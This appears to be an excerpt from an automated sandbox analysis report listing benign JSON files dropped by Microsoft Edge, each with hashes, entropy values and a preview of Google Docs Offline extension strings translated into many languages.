                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1337
                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2846
                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):934
                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):963
                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1320
                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):884
                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                            MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                            SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                            SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                            SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):980
                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                            MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                            SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                            SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                            SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1941
Entropy (8bit):4.132139619026436
Encrypted:false
SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:DCC0D1725AEAEAAF1690EF8053529601
SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1969
Entropy (8bit):4.327258153043599
Encrypted:false
SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:385E65EF723F1C4018EEE6E4E56BC03F
SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:false
Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1674
Entropy (8bit):4.343724179386811
Encrypted:false
SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:64077E3D186E585A8BEA86FF415AA19D
SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:false
Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1063
Entropy (8bit):4.853399816115876
Encrypted:false
SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:76B59AAACC7B469792694CF3855D3F4C
SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:false
Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1333
Entropy (8bit):4.686760246306605
Encrypted:false
SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:970963C25C2CEF16BB6F60952E103105
SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:false
Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1263
Entropy (8bit):4.861856182762435
Encrypted:false
SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:8B4DF6A9281333341C939C244DDB7648
SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:false
Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1074
Entropy (8bit):5.062722522759407
Encrypted:false
SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:773A3B9E708D052D6CBAA6D55C8A5438
SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:false
Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):879
Entropy (8bit):5.7905809868505544
Encrypted:false
SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:false
Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1205
Entropy (8bit):4.50367724745418
Encrypted:false
SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:524E1B2A370D0E71342D05DDE3D3E774
SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:false
Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):843
Entropy (8bit):5.76581227215314
Encrypted:false
SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:false
Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):912
                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
